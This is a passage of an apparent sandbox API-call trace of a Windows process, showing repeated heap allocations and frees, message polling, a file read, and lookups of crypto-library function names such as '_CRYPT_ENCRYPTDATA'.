(HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0079.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0079.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0079.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0079.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0079.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0079.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0079.186] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0079.186] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0079.186] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0079.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0079.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0079.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0079.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0079.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0079.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0079.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0079.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0079.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0f020 [0079.190] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0079.190] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ecd0*=0xb11b, lpOverlapped=0x0) returned 1 [0079.192] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0079.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0079.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0079.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb11b) returned 0x499a008 [0079.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0f020 | out: hHeap=0x1780000) returned 1 [0079.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0079.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0079.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0079.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0079.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb11b) returned 0x49a5130 [0079.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0079.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.196] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0079.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0079.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0079.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0079.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb11b) returned 0x499a008 [0079.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0079.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0079.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0079.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.197] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0079.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0079.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0079.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0079.197] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0079.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0079.197] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0079.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0079.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0079.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25d0 [0079.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0079.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0079.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0079.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0079.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb11b) returned 0x499a008 [0079.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2550 [0079.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0079.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0079.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0079.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2580 [0079.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0079.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0079.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0079.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25f0 [0079.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0079.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0079.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0079.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa60 [0079.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0079.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0079.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0079.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0079.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0079.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb11b) returned 0x49b0258 [0079.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0079.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0079.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0079.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0079.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0079.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0079.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0079.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0079.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0079.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0079.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0079.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0079.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0079.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0079.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0079.199] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0079.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0079.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0079.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0079.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0079.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0079.199] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0079.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0079.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0079.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0079.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0079.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0079.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0079.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0079.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0079.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0079.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0079.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0079.199] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0079.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0079.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0079.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27d0 [0079.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0079.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0079.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0079.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0079.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caaa8 [0079.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0079.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0079.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0079.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0079.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0079.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0079.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0079.200] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0079.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0079.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0079.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0079.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0079.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0079.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0079.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0079.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0079.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0079.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0079.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0079.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0079.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0079.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0079.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0079.201] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0079.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0079.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0079.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0079.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0079.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0079.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0079.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0079.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0079.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0079.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0079.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0079.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0079.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0079.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0079.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0079.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0079.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0079.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0079.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0079.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0079.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0079.202] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0079.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0079.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0079.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0079.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0079.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0079.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0079.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0079.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0079.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0079.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0079.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0079.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e00 [0079.203] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e00 | out: hHeap=0x1780000) returned 1 [0079.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad30 [0079.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0079.203] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0079.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0079.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0079.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0079.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0079.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0079.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0079.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0079.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0079.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0079.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0079.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0079.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0079.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0079.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0079.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0079.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0079.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0079.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0079.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0079.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0079.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0079.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0079.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0079.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0079.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0079.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0079.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0079.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0079.205] RtlAllocateHeap 